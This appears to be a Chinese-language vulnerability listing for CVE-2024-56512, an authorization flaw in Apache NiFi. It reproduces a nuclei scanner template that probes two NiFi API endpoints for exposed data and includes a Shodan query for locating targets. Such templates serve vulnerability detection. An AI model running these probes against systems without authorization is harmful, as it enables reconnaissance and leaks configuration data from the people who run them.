CVE-2024-56512: Apache NiFi - Information Disclosure

日期: 2025-08-01 | 影响软件: Apache NiFi | POC: 已公开

漏洞描述

Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group.

PoC代码[已公开]

id: CVE-2024-56512

info:
  name: Apache NiFi - Information Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group.
  reference:
    - https://lists.apache.org/thread/cjc8fns5kjsho0s7vonlnojokyfx47wn
    - http://www.openwall.com/lists/oss-security/2024/12/28/1
    - https://github.com/absholi7ly/CVE-2024-56512-Apache-NiFi-Exploit/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-56512
  classification:
    cve-id: CVE-2024-56512
    epss-score: 0.24894
    epss-percentile: 0.95964
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Nifi"
  tags: cve,cve2024,nifi,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"

    payloads:
      path:
        - /nifi-api/flow/process-groups/root
        - /nifi-api/controller/config

    matchers-condition: or
    matchers:
      - type: dsl
        name: process-group-information
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "processGroupFlow", "breadcrumb")'
          - 'status_code == 200'
        condition: and

      - type: dsl
        name: config-information
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "maxTimerDrivenThreadCount", "maxEventDrivenThreadCount")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402205e0d9ca4e28ce5d30bbf1757fd71f9e2e0c35448ec7932cd0cd5657ac8e0bdc80220130f39464d03c0a89c9a2298ff9500e900c8cff74a9b21639ca33c015fef8b16:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-56512.yaml

相关漏洞推荐